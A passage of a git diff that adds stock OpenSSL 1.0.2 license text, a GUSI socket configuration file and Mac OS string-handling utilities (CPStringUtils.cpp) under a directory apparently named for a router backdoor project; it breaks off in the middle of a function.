+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+ Original SSLeay License
+ -----------------------
+
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ * 
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ * 
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ * 
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from 
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ * 
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ * 
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/MacOS/GUSI_Init.cpp b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/MacOS/GUSI_Init.cpp
new file mode 100644
index 0000000..d8223db
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/MacOS/GUSI_Init.cpp
@@ -0,0 +1,62 @@
+/**************** BEGIN GUSI CONFIGURATION ****************************
+ *
+ * GUSI Configuration section generated by GUSI Configurator
+ * last modified: Wed Jan  5 20:33:51 2000
+ *
+ * This section will be overwritten by the next run of Configurator.
+ */
+
+#define GUSI_SOURCE
+#include <GUSIConfig.h>
+#include <sys/cdefs.h>
+
+/* Declarations of Socket Factories */
+
+__BEGIN_DECLS
+void GUSIwithInetSockets();
+void GUSIwithLocalSockets();
+void GUSIwithMTInetSockets();
+void GUSIwithMTTcpSockets();
+void GUSIwithMTUdpSockets();
+void GUSIwithOTInetSockets();
+void GUSIwithOTTcpSockets();
+void GUSIwithOTUdpSockets();
+void GUSIwithPPCSockets();
+void GUSISetupFactories();
+__END_DECLS
+
+/* Configure Socket Factories */
+
+void GUSISetupFactories()
+{
+#ifdef GUSISetupFactories_BeginHook
+	GUSISetupFactories_BeginHook
+#endif
+	GUSIwithInetSockets();
+#ifdef GUSISetupFactories_EndHook
+	GUSISetupFactories_EndHook
+#endif
+}
+
+/* Declarations of File Devices */
+
+__BEGIN_DECLS
+void GUSIwithDConSockets();
+void GUSIwithNullSockets();
+void GUSISetupDevices();
+__END_DECLS
+
+/* Configure File Devices */
+
+void GUSISetupDevices()
+{
+#ifdef GUSISetupDevices_BeginHook
+	GUSISetupDevices_BeginHook
+#endif
+	GUSIwithNullSockets();
+#ifdef GUSISetupDevices_EndHook
+	GUSISetupDevices_EndHook
+#endif
+}
+
+/**************** END GUSI CONFIGURATION *************************/
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/MacOS/GetHTTPS.src/CPStringUtils.cpp b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/MacOS/GetHTTPS.src/CPStringUtils.cpp
new file mode 100644
index 0000000..617aae2
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/MacOS/GetHTTPS.src/CPStringUtils.cpp
@@ -0,0 +1,2753 @@
+/* ====================================================================
+ * Copyright (c) 1998-1999 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer. 
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+ 
+ 
+ 
+ #include "CPStringUtils.hpp"
+#include "ErrorHandling.hpp"
+
+
+
+#define kNumberFormatString			"\p########0.00#######;-########0.00#######"
+
+
+
+//	Useful utility functions which could be optimized a whole lot
+
+
+void CopyPStrToCStr(const unsigned char *thePStr,char *theCStr,const int maxCStrLength)
+{
+int		i,numPChars;
+
+
+	if (thePStr != nil && theCStr != nil && maxCStrLength > 0)
+	{
+		numPChars = thePStr[0];
+		
+		for (i = 0;;i++)
+		{
+			if (i >= numPChars || i >= maxCStrLength - 1)
+			{
+				theCStr[i] = 0;
+				
+				break;
+			}
+			
+			else
+			{
+				theCStr[i] = thePStr[i + 1];
+			}
+		}
+	}
+}
+
+
+void CopyPStrToPStr(const unsigned char *theSrcPStr,unsigned char *theDstPStr,const int maxDstStrLength)
+{
+int		theMaxDstStrLength;
+
+	
+	theMaxDstStrLength = maxDstStrLength;
+	
+	
+	if (theDstPStr != nil && theSrcPStr != nil && theMaxDstStrLength > 0)
+	{
+		if (theMaxDstStrLength > 255)
+		{
+			theMaxDstStrLength = 255;
+		}
+		
+		
+		if (theMaxDstStrLength - 1 < theSrcPStr[0])
+		{
+			BlockMove(theSrcPStr + 1,theDstPStr + 1,theMaxDstStrLength - 1);
+			
+			theDstPStr[0] = theMaxDstStrLength - 1;
+		}
+		
+		else
+		{
+			BlockMove(theSrcPStr,theDstPStr,theSrcPStr[0] + 1);
+		}
+	}
+}
+
+
+void CopyCStrToCStr(const char *theSrcCStr,char *theDstCStr,const int maxDstStrLength)
+{
+int		i;
+
+
+	if (theDstCStr != nil && theSrcCStr != nil && maxDstStrLength > 0)
+	{
+		for (i = 0;;i++)
+		{
+			if (theSrcCStr[i] == 0 || i >= maxDstStrLength - 1)
+			{
+				theDstCStr[i] = 0;
+				
+				break;
+			}
+			
+			else
+			{
+				theDstCStr[i] = theSrcCStr[i];
+			}
+		}
+	}
+}
+
+
+
+void CopyCSubstrToCStr(const char *theSrcCStr,const int maxCharsToCopy,char *theDstCStr,const int maxDstStrLength)
+{
+int		i;
+
+
+	if (theDstCStr != nil && theSrcCStr != nil && maxDstStrLength > 0)
+	{
+		for (i = 0;;i++)
+		{
+			if (theSrcCStr[i] == 0 || i >= maxDstStrLength - 1 || i >= maxCharsToCopy)
+			{
+				theDstCStr[i] = 0;
+				
+				break;
+			}
+			
+			else
+			{
+				theDstCStr[i] = theSrcCStr[i];
+			}
+		}
+	}
+}
+
+
+
+void CopyCSubstrToPStr(const char *theSrcCStr,const int maxCharsToCopy,unsigned char *theDstPStr,const int maxDstStrLength)
+{
+int		i;
+int		theMaxDstStrLength;
+
+	
+	theMaxDstStrLength = maxDstStrLength;
+
+	if (theDstPStr != nil && theSrcCStr != nil && theMaxDstStrLength > 0)
+	{
+		if (theMaxDstStrLength > 255)
+		{
+			theMaxDstStrLength = 255;
+		}
+		
+		
+		for (i = 0;;i++)
+		{
+			if (theSrcCStr[i] == 0 || i >= theMaxDstStrLength - 1 || i >= maxCharsToCopy)
+			{
+				theDstPStr[0] = i;
+				
+				break;
+			}
+			
+			else
+			{
+				theDstPStr[i + 1] = theSrcCStr[i];
+			}
+		}
+	}
+}
+
+
+
+void CopyCStrToPStr(const char *theSrcCStr,unsigned char *theDstPStr,const int maxDstStrLength)
+{
+int		i;
+int		theMaxDstStrLength;
+
+	
+	theMaxDstStrLength = maxDstStrLength;
+
+	if (theDstPStr != nil && theSrcCStr != nil && theMaxDstStrLength > 0)
+	{
+		if (theMaxDstStrLength > 255)
+		{
+			theMaxDstStrLength = 255;
+		}
+		
+		
+		for (i = 0;;i++)
+		{
+			if (i >= theMaxDstStrLength - 1 || theSrcCStr[i] == 0)
+			{
+				theDstPStr[0] = i;
+				
+				break;
+			}
+			
+			else
+			{
+				theDstPStr[i + 1] = theSrcCStr[i];
+			}
+		}
+	}
+}
+
+
+void ConcatPStrToCStr(const unsigned char *thePStr,char *theCStr,const int maxCStrLength)
+{
+int		i,numPChars,cStrLength;
+
+
+	if (thePStr != nil && theCStr != nil && maxCStrLength > 0)
+	{
+		for (cStrLength = 0;theCStr[cStrLength] != 0;cStrLength++)
+		{
+		
+		}
+		
+
+		numPChars = thePStr[0];
+		
+		
+		for (i = 0;;i++)
+		{
+			if (i >= numPChars || cStrLength >= maxCStrLength - 1)
+			{
+				theCStr[cStrLength++] = 0;
+				
+				break;
+			}
+			
+			else
+			{
+				theCStr[cStrLength++] = thePStr[i + 1];
+			}
+		}
+	}
+}
+
+
+
+void ConcatPStrToPStr(const unsigned char *theSrcPStr,unsigned char *theDstPStr,const int maxDstStrLength)
+{
+int		theMaxDstStrLength;
+
+	
+	theMaxDstStrLength = maxDstStrLength;
+	
+	if (theSrcPStr != nil && theDstPStr != nil && theMaxDstStrLength > 0)
+	{
+		if (theMaxDstStrLength > 255)
+		{
+			theMaxDstStrLength = 255;
+		}
+		
+		
+		if (theMaxDstStrLength - theDstPStr[0] - 1 < theSrcPStr[0])
+		{
+			BlockMove(theSrcPStr + 1,theDstPStr + theDstPStr[0] + 1,theMaxDstStrLength - 1 - theDstPStr[0]);
+			
+			theDstPStr[0] = theMaxDstStrLength - 1;
+		}
+		
+		else
+		{
+			BlockMove(theSrcPStr + 1,theDstPStr + theDstPStr[0] + 1,theSrcPStr[0]);
+			
+			theDstPStr[0] += theSrcPStr[0];
+		}
+	}
+}
+
+
+
+void ConcatCStrToPStr(const char *theSrcCStr,unsigned char *theDstPStr,const int maxDstStrLength)
+{
+int		i,thePStrLength;
+int		theMaxDstStrLength;
+
+	
+	theMaxDstStrLength = maxDstStrLength;
+
+	if (theSrcCStr != nil && theDstPStr != nil && theMaxDstStrLength > 0)
+	{
+		if (theMaxDstStrLength > 255)
+		{
+			theMaxDstStrLength = 255;
+		}
+		
+		
+		thePStrLength = theDstPStr[0];
+		
+		for (i = 0;;i++)
+		{
+			if (theSrcCStr[i] == 0 || thePStrLength >= theMaxDstStrLength - 1)
+			{
+				theDstPStr[0] = thePStrLength;
+				
+				break;
+			}
+			
+			else
+			{
+				theDstPStr[thePStrLength + 1] = theSrcCStr[i];
+				
+				thePStrLength++;
+			}
+		}
+	}
+}
+
+
+
+void ConcatCStrToCStr(const char *theSrcCStr,char *theDstCStr,const int maxCStrLength)
+{
+int		cStrLength;
+
+
+	if (theSrcCStr != nil && theDstCStr != nil && maxCStrLength > 0)
+	{
+		for (cStrLength = 0;theDstCStr[cStrLength] != 0;cStrLength++)
+		{
+		
+		}
+		
+
+		for (;;)
+		{
+			if (*theSrcCStr == 0 || cStrLength >= maxCStrLength - 1)
+			{
+				theDstCStr[cStrLength++] = 0;
+				
+				break;
+			}
+			
+			else
+			{
+				theDstCStr[cStrLength++] = *theSrcCStr++;
+			}
+		}
+	}
+}
+
+
+
+void ConcatCharToCStr(const char theChar,char *theDstCStr,const int maxCStrLength)
+{
+int		cStrLength;
+
+
+	if (theDstCStr != nil && maxCStrLength > 0)
+	{
+		cStrLength = CStrLength(theDstCStr);
+		
+		if (cStrLength < maxCStrLength - 1)
+		{
+			theDstCStr[cStrLength++] = theChar;
+			theDstCStr[cStrLength++] = '\0';
+		}
+	}
+}
+
+
+
+void ConcatCharToPStr(const char theChar,unsigned char *theDstPStr,const int maxPStrLength)
+{
+int		pStrLength;
+
+
+	if (theDstPStr != nil && maxPStrLength > 0)
+	{
+		pStrLength = PStrLength(theDstPStr);
+		
+		if (pStrLength < maxPStrLength - 1 && pStrLength < 255)
+		{
+			theDstPStr[pStrLength + 1] = theChar;
+			theDstPStr[0] += 1;
+		}
+	}
+}
+
+
+
+
+int CompareCStrs(const char *theFirstCStr,const char *theSecondCStr,const Boolean ignoreCase)
+{
+int		returnValue;
+char	firstChar,secondChar;
+
+	
+	returnValue = 0;
+	
+	
+	if (theFirstCStr != nil && theSecondCStr != nil)
+	{
+		for (;;)
+		{
+			firstChar = *theFirstCStr;
+			secondChar = *theSecondCStr;
+			
+			if (ignoreCase == true)
+			{
+				if (firstChar >= 'A' && firstChar <= 'Z')
+				{
+					firstChar = 'a' + (firstChar - 'A');
+				}
+				
+				if (secondChar >= 'A' && secondChar <= 'Z')
+				{
+					secondChar = 'a' + (secondChar - 'A');
+				}
+			}
+			
+			
+			if (firstChar == 0 && secondChar != 0)
+			{
+				returnValue = -1;
+				
+				break;
+			}
+			
+			else if (firstChar != 0 && secondChar == 0)
+			{
+				returnValue = 1;
+				
+				break;
+			}
+			
+			else if (firstChar == 0 && secondChar == 0)
+			{
+				returnValue = 0;
+				
+				break;
+			}
+			
+			else if (firstChar < secondChar)
+			{
+				returnValue = -1;
+				
+				break;
+			}
+			
+			else if (firstChar > secondChar)
+			{
+				returnValue = 1;
+				
+				break;
+			}
+			
+			theFirstCStr++;
+			theSecondCStr++;
+		}
+	}
+	
+	
+	return(returnValue);
+}
+
+
+
+Boolean CStrsAreEqual(const char *theFirstCStr,const char *theSecondCStr,const Boolean ignoreCase)
+{
+	if (CompareCStrs(theFirstCStr,theSecondCStr,ignoreCase) == 0)
+	{
+		return true;
+	}
+	
+	else
+	{
+		return false;
+	}
+}
+
+
+Boolean PStrsAreEqual(const unsigned char *theFirstPStr,const unsigned char *theSecondPStr,const Boolean ignoreCase)
+{
+	if (ComparePStrs(theFirstPStr,theSecondPStr,ignoreCase) == 0)
+	{
+		return true;
+	}
+	
+	else
+	{
+		return false;
+	}
+}
+
+
+
+int ComparePStrs(const unsigned char *theFirstPStr,const unsigned char *theSecondPStr,const Boolean ignoreCase)
+{
+int		i,returnValue;
+char	firstChar,secondChar;
+
+	
+	returnValue = 0;
+	
+	
+	if (theFirstPStr != nil && theSecondPStr != nil)
+	{
+		for (i = 1;;i++)
+		{
+			firstChar = theFirstPStr[i];
+			secondChar = theSecondPStr[i];
+
+			if (ignoreCase == true)
+			{
+				if (firstChar >= 'A' && firstChar <= 'Z')
+				{
+					firstChar = 'a' + (firstChar - 'A');
+				}
+				
+				if (secondChar >= 'A' && secondChar <= 'Z')
+				{
+					secondChar = 'a' + (secondChar - 'A');
+				}
+			}
+
+
+			if (theFirstPStr[0] < i && theSecondPStr[0] >= i)
+			{
+				returnValue = -1;
+				
+				break;
+			}
+			
+			else if (theFirstPStr[0] >= i && theSecondPStr[0] < i)
+			{
+				returnValue = 1;
+				
+				break;
+			}
+			
+			else if (theFirstPStr[0] < i && theSecondPStr[0] < i)
+			{
+				returnValue = 0;
+				
+				break;
+			}
+			
+			else if (firstChar < secondChar)
+			{
+				returnValue = -1;
+				
+				break;
+			}
+			
+			else if (firstChar > secondChar)
+			{
+				returnValue = 1;
+				
+				break;
+			}
+		}
+	}
+	
+	
+	return(returnValue);
+}
+
+
+
+int CompareCStrToPStr(const char *theCStr,const unsigned char *thePStr,const Boolean ignoreCase)
+{
+int		returnValue;
+char	tempString[256];
+
+	
+	returnValue = 0;
+	
+	if (theCStr != nil && thePStr != nil)
+	{
+		CopyPStrToCStr(thePStr,tempString,sizeof(tempString));
+		
+		returnValue = CompareCStrs(theCStr,tempString,ignoreCase);
+	}
+	
+	
+	return(returnValue);
+}
+
+
+
+void ConcatLongIntToCStr(const long theNum,char *theCStr,const int maxCStrLength,const int numDigits)
+{
+Str255 		theStr255;
+
+
+	NumToString(theNum,theStr255);
+
+
+	if (numDigits > 0)
+	{
+	int 	charsToInsert;
+	
+		
+		charsToInsert = numDigits - PStrLength(theStr255);
+		
+		if (charsToInsert > 0)
+		{
+		char	tempString[256];
+			
+			CopyCStrToCStr("",tempString,sizeof(tempString));
+			
+			for (;charsToInsert > 0;charsToInsert--)
+			{
+				ConcatCStrToCStr("0",tempString,sizeof(tempString));
+			}
+			
+			ConcatPStrToCStr(theStr255,tempString,sizeof(tempString));
+			
+			CopyCStrToPStr(tempString,theStr255,sizeof(theStr255));
+		}
+	}
+
+
+	ConcatPStrToCStr(theStr255,theCStr,maxCStrLength);
+}
+
+
+
+
+void ConcatLongIntToPStr(const long theNum,unsigned char *thePStr,const int maxPStrLength,const int numDigits)
+{
+Str255 		theStr255;
+
+
+	NumToString(theNum,theStr255);
+
+
+	if (numDigits > 0)
+	{
+	int 	charsToInsert;
+	
+		
+		charsToInsert = numDigits - PStrLength(theStr255);
+		
+		if (charsToInsert > 0)
+		{
+		char	tempString[256];
+			
+			CopyCStrToCStr("",tempString,sizeof(tempString));
+			
+			for (;charsToInsert > 0;charsToInsert--)
+			{
+				ConcatCStrToCStr("0",tempString,sizeof(tempString));
+			}
+			
+			ConcatPStrToCStr(theStr255,tempString,sizeof(tempString));
+			
+			CopyCStrToPStr(tempString,theStr255,sizeof(theStr255));
+		}
+	}
+
+
+	ConcatPStrToPStr(theStr255,thePStr,maxPStrLength);
+}
+
+
+
+void CopyCStrAndConcatLongIntToCStr(const char *theSrcCStr,const long theNum,char *theDstCStr,const int maxDstStrLength)
+{
+	CopyCStrToCStr(theSrcCStr,theDstCStr,maxDstStrLength);
+	
+	ConcatLongIntToCStr(theNum,theDstCStr,maxDstStrLength);
+}
+
+
+
+void CopyLongIntToCStr(const long theNum,char *theCStr,const int maxCStrLength,const int numDigits)
+{
+Str255 		theStr255;
+
+
+	NumToString(theNum,theStr255);
+
+
+	if (numDigits > 0)
+	{
+	int 	charsToInsert;
+	
+		
+		charsToInsert = numDigits - PStrLength(theStr255);
+		
+		if (charsToInsert > 0)
+		{
+		char	tempString[256];
+			
+			CopyCStrToCStr("",tempString,sizeof(tempString));
+			
+			for (;charsToInsert > 0;charsToInsert--)
+			{
+				ConcatCStrToCStr("0",tempString,sizeof(tempString));
+			}
+			
+			ConcatPStrToCStr(theStr255,tempString,sizeof(tempString));
+			
+			CopyCStrToPStr(tempString,theStr255,sizeof(theStr255));
+		}
+	}
+
+
+	CopyPStrToCStr(theStr255,theCStr,maxCStrLength);
+}
+
+
+
+
+
+void CopyUnsignedLongIntToCStr(const unsigned long theNum,char *theCStr,const int maxCStrLength)
+{
+char			tempString[256];
+int				srcCharIndex,dstCharIndex;
+unsigned long	tempNum,quotient,remainder;
+
+	
+	if (theNum == 0)
+	{
+		CopyCStrToCStr("0",theCStr,maxCStrLength);
+	}
+	
+	else
+	{
+		srcCharIndex = 0;
+		
+		tempNum = theNum;
+		
+		for (;;)
+		{
+			if (srcCharIndex >= sizeof(tempString) - 1 || tempNum == 0)
+			{
+				for (dstCharIndex = 0;;)
+				{
+					if (dstCharIndex >= maxCStrLength - 1 || srcCharIndex <= 0)
+					{
+						theCStr[dstCharIndex] = 0;
+						
+						break;
+					}
+					
+					theCStr[dstCharIndex++] = tempString[--srcCharIndex];
+				}
+				
+				break;
+			}
+			
+
+			quotient = tempNum / 10;
+			
+			remainder = tempNum - (quotient * 10);
+			
+			tempString[srcCharIndex] = '0' + remainder;
+			
+			srcCharIndex++;
+			
+			tempNum = quotient;
+		}
+	}
+}
+
+
+
+
+void CopyLongIntToPStr(const long theNum,unsigned char *thePStr,const int maxPStrLength,const int numDigits)
+{
+char	tempString[256];
+
+
+	CopyLongIntToCStr(theNum,tempString,sizeof(tempString),numDigits);
+	
+	CopyCStrToPStr(tempString,thePStr,maxPStrLength);
+}
+
+
+
+OSErr CopyLongIntToNewHandle(const long inTheLongInt,Handle *theHandle)
+{
+OSErr		errCode = noErr;
+char		tempString[32];
+	
+	
+	CopyLongIntToCStr(inTheLongInt,tempString,sizeof(tempString));
+	
+	errCode = CopyCStrToNewHandle(tempString,theHandle);
+
+	return(errCode);
+}
+
+
+OSErr CopyLongIntToExistingHandle(const long inTheLongInt,Handle theHandle)
+{
+OSErr		errCode = noErr;
+char		tempString[32];
+	
+	
+	CopyLongIntToCStr(inTheLongInt,tempString,sizeof(tempString));
+	
+	errCode = CopyCStrToExistingHandle(tempString,theHandle);
+
+	return(errCode);
+}
+
+
+
+
+OSErr CopyCStrToExistingHandle(const char *theCString,Handle theHandle)
+{
+OSErr	errCode = noErr;
+long	stringLength;
+
+	
+	if (theCString == nil)
+	{
+		SetErrorMessageAndBail(("CopyCStrToExistingHandle: Bad parameter, theCString == nil"));
+	}
+
+	if (theHandle == nil)
+	{
+		SetErrorMessageAndBail(("CopyCStrToExistingHandle: Bad parameter, theHandle == nil"));
+	}
+
+	if (*theHandle == nil)
+	{
+		SetErrorMessageAndBail(("CopyCStrToExistingHandle: Bad parameter, *theHandle == nil"));
+	}
+
+
+
+	stringLength = CStrLength(theCString) + 1;
+	
+	SetHandleSize(theHandle,stringLength);
+	
+	if (GetHandleSize(theHandle) < stringLength)
+	{
+		SetErrorMessageAndLongIntAndBail("CopyCStrToExistingHandle: Can't set Handle size, MemError() = ",MemError());
+	}
+	
+	
+	::BlockMove(theCString,*theHandle,stringLength);
+	
+
+EXITPOINT:
+	
+	return(errCode);
+}
+
+
+
+
+
+OSErr CopyCStrToNewHandle(const char *theCString,Handle *theHandle)
+{
+OSErr	errCode = noErr;
+long	stringLength;
+
+	
+	if (theCString == nil)
+	{
+		SetErrorMessageAndBail(("CopyCStrToNewHandle: Bad parameter, theCString == nil"));
+	}
+
+	if (theHandle == nil)
+	{
+		SetErrorMessageAndBail(("CopyCStrToNewHandle: Bad parameter, theHandle == nil"));
+	}
+
+
+
+	stringLength = CStrLength(theCString) + 1;
+	
+	*theHandle = NewHandle(stringLength);
+	
+	if (*theHandle == nil)
+	{
+		SetErrorMessageAndLongIntAndBail("CopyCStrToNewHandle: Can't allocate Handle, MemError() = ",MemError());
+	}
+	
+	
+	::BlockMove(theCString,**theHandle,stringLength);
+	
+
+EXITPOINT:
+	
+	return(errCode);
+}
+
+
+
+OSErr CopyPStrToNewHandle(const unsigned char *thePString,Handle *theHandle)
+{
+OSErr	errCode = noErr;
+long	stringLength;
+
+	
+	if (thePString == nil)
+	{
+		SetErrorMessageAndBail(("CopyPStrToNewHandle: Bad parameter, thePString == nil"));
+	}
+
+	if (theHandle == nil)
+	{
+		SetErrorMessageAndBail(("CopyPStrToNewHandle: Bad parameter, theHandle == nil"));
+	}
+
+
+
+	stringLength = PStrLength(thePString) + 1;
+	
+	*theHandle = NewHandle(stringLength);
+	
+	if (*theHandle == nil)
+	{
+		SetErrorMessageAndLongIntAndBail("CopyPStrToNewHandle: Can't allocate Handle, MemError() = ",MemError());
+	}
+	
+	
+	if (stringLength > 1)
+	{
+		BlockMove(thePString + 1,**theHandle,stringLength - 1);
+	}
+	
+	(**theHandle)[stringLength - 1] = 0;
+	
+
+EXITPOINT:
+	
+	return(errCode);
+}
+
+
+OSErr AppendPStrToHandle(const unsigned char *thePString,Handle theHandle,long *currentLength)
+{
+OSErr		errCode = noErr;
+char		tempString[256];
+
+	
+	CopyPStrToCStr(thePString,tempString,sizeof(tempString));
+	
+	errCode = AppendCStrToHandle(tempString,theHandle,currentLength);
+	
+
+EXITPOINT:
+	
+	return(errCode);
+}
+
+
+
+OSErr AppendCStrToHandle(const char *theCString,Handle theHandle,long *currentLength,long *maxLength)
+{
+OSErr		errCode = noErr;
+long		handleMaxLength,handleCurrentLength,stringLength,byteCount;
+
+
+	if (theCString == nil)
+	{
+		SetErrorMessageAndBail(("AppendCStrToHandle: Bad parameter, theCString == nil"));
+	}
+
+	if (theHandle == nil)
+	{
+		SetErrorMessageAndBail(("AppendCStrToHandle: Bad parameter, theHandle == nil"));
+	}
+	
+	
+	if (maxLength != nil)
+	{
+		handleMaxLength = *maxLength;
+	}
+	
+	else
+	{
+		handleMaxLength = GetHandleSize(theHandle);
+	}
+	
+	
+	if (currentLength != nil && *currentLength >= 0)
+	{
+		handleCurrentLength = *currentLength;
+	}
+	
+	else
+	{
+		handleCurrentLength = CStrLength(*theHandle);
+	}
+	
+	
+	stringLength = CStrLength(theCString);
+	
+	byteCount = handleCurrentLength + stringLength + 1;
+	
+	if (byteCount > handleMaxLength)
+	{
+		SetHandleSize(theHandle,handleCurrentLength + stringLength + 1);
+		
+		if (maxLength != nil)
+		{
+			*maxLength = GetHandleSize(theHandle);
+			
+			handleMaxLength = *maxLength;
+		}
+		
+		else
+		{
+			handleMaxLength = GetHandleSize(theHandle);
+		}
+
+		if (byteCount > handleMaxLength)
+		{
+			SetErrorMessageAndLongIntAndBail("AppendCStrToHandle: Can't increase Handle allocation, MemError() = ",MemError());
+		}
+	}
+	
+	
+	BlockMove(theCString,*theHandle + handleCurrentLength,stringLength + 1);
+	
+	
+	if (currentLength != nil)
+	{
+		*currentLength += stringLength;
+	}
+
+
+	errCode = noErr;
+	
+	
+EXITPOINT:
+
+	return(errCode);
+}
+
+
+
+OSErr AppendCharsToHandle(const char *theChars,const int numChars,Handle theHandle,long *currentLength,long *maxLength)
+{
+OSErr		errCode = noErr;
+long		handleMaxLength,handleCurrentLength,byteCount;
+
+
+	if (theChars == nil)
+	{
+		SetErrorMessageAndBail(("AppendCharsToHandle: Bad parameter, theChars == nil"));
+	}
+
+	if (theHandle == nil)
+	{
+		SetErrorMessageAndBail(("AppendCharsToHandle: Bad parameter, theHandle == nil"));
+	}
+	
+	
+	if (maxLength != nil)
+	{
+		handleMaxLength = *maxLength;
+	}
+	
+	else
+	{
+		handleMaxLength = GetHandleSize(theHandle);
+	}
+	
+	
+	if (currentLength != nil && *currentLength >= 0)
+	{
